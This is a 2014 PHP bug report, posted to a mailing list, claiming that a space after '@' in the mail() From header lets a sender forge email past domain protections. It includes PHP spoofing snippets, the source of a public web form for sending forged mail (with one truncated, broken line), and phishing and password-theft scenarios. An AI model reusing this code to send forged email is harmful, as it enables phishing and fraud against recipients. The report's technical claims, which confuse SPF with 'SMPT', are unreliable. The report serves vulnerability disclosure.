Bug #67494 [NEW]: PHP Bug allows anyone to send fake email even SMPT protection is used.
| From: | ashesh1708 at gmail dot com | Date: | Sun, 22 Jun 2014 04:21:27 +0000 |
| Subject: | Bug #67494 [NEW]: PHP Bug allows anyone to send fake email even SMPT protection is used. | ||
| Groups: | php.bugs | ||
| Request: | Send a blank email to php-bugs+get-186287@lists.php.net to get a copy of this message | ||
From: ashesh1708 at gmail dot com
Operating system: ALL
PHP version: 5.6.0RC1
Package: *Mail Related
Bug Type: Bug
Bug description:PHP Bug allows anyone to send fake email even SMPT protection is used.
Description:
------------
Description
I have found a bug in Latest version of PHP that makes me send spoofed
emails ,using a simple code I can bypass the SMPT protection used by
many companies to prevent spoofed email sending, Like Facebook, Google,
Yahoo etc. This bug is applicable to ALL websites including Facebook,
Google etc.
_________________________________________________
Here's the code to exploit:
1. IF SMPT PROTECTION USED (EVEN ITS STRICT POLICY)
<?php
$to = "victim@example.com";
$subject = "Subject_here";
$txt = "Message here";
// This works because I included a space between @ and domain
$headers = "From: Username@ domain.com";
mail($to,$subject,$txt,$headers);
?>
2. If SMPT PROTECTION IS NOT USED
<?php
$to = "victim@example.com";
$subject = "Subject_here";
$txt = "Message here";
// As SMPT Protection is not used , no need to include space.
$headers = "From: Username@domain.com";
mail($to,$subject,$txt,$headers);
?>
_____________________________________________________________________
Why it can't be fixed by any website?
There is no way this could be fixed by individual websites even with
Facebook, As They can add SMPT protection for facebook.com but thy can
never own [space]facebook.com, So they can never add an SMPT protection
for [SPACE]facebook.com
___________________________________________________________________
EXPLOIT SCENARIO
If I send a mail from attacker@example.com OR from attacker@ example.com
they both are considered same by email providers.
Using this I can send Spoofed email to victim telling to change his/her
password. Then I use the appropriate PHP codes I mentioned above. It
appears to be same when received.
1) Phishing
2) Change Password
3)Make Fake Transition
4) Click on Virus link
5) Removes the trust of user on the website
etc.
Scenario 1:
Jim meets jack physically and decides an deal. An attacker somehow know
this, He want the deal to be cancelled. he sends a spoofed mail from
admin@xyz.com to jim@yahoo.com telling that deal is cancelled for some
reason.
Scenario 2:
One day jim opens his email and sees an email from security@yahoo.co.uk
regarding changing password. He doubts that yahoo.co.in is owned by
Yahoo! Company or not? Then he opens http://yahoo.co.uk in his web
browser which redirects him to ORIGINAL Yahoo! , It confirms that
yahoo.co.uk is owned by Yahoo!
(Big companies own all domains eg. http:/googole.com,
http:/google.co.in, http:/google.co.uk all is owned by google same
is
the case with Yahoo!)
He clicks that change password link, clicking on the link takes him to a
website where certain JavaScript is executed which steals his yahoo id
and password (SESSION). The results can be more dangerous.
___________________________________________________________________________-
Proof OF Concept
Two images are attached. Each of one shows use of the codes , I
mentioned above.
Image 1 : http://h.dropcanvas.com/fwt60/When_protection_is_used.png
Image 2 : http://h.dropcanvas.com/fwt60/When_protection_is_NOT_used.png
I have made a website (http://cdata.comule.com) to send the spoofed mail
combining the two codes. (Please don't send more than 5 mails per minute
and wait 5 minutes for mail to arrive)
The source code of my website is :
a) index.php
<html>
<body>
<h3>If using SMPT Protection use (username@[SPACE]example.com) in "From"
field eg. (world123@ facebook.com)</h3>
<form action="submit.php" method="post">
To: <input type="text" name="to"><br>
From: <input type="text" name="from"><br>
Subject: <input type="text" name="subject"><br>
Message: <textarea name="message"></textarea><br>
<input type="submit">
</form>
</body>
</html>
b) submit.php
<?php
$to = $_POST["to"];
$subject = $_POST["subject"];
$txt = $_POST["message"];
$headers = "From: ".$_POST["from"];
if(mail($to,$subject,$txt,$headers)){
echo "SENT";
echo "<br>";
echo "TO: ".$_POST["to"];
echo "<br>";
echo "From: ".$_POST[
echo "<br>";
echo "Subject: ".$_POST["subject"];
echo "<br>";
echo "Content: ".$_POST["message"];
echo "<br>";
}else{
echo "Fail";
}
I made a Proof of Concept video about how this can be exploited in
Yahoo! mail (https://www.dropbox.com/s/ir8dprnetk322n8/POC.mp4)
_____________________________________________________________________________________________
FIX
PHP should not allow mail to be sent if there is a space after "@"
_____________________________________________________________________________________________
Additional Notes
It is easy to detect an spoofed mail. But only 2% of people over that
WORLD knows it!
Its necessary to Fix this to prevent misunderstanding and attacks.
Here's how to add SMPT Protection to your Domain (Even i can bypass it)
https://www.digitalocean.com/community/tutorials/how-to-use-an-spf-record-to-prevent-spoofing-improve-e-mail-reliability
Test script:
---------------
http://cdata.comule.com/ (Please don't send more than 5
mails per
minute)
--
Edit bug report at https://bugs.php.net/bug.php?id=67494&edit=1
--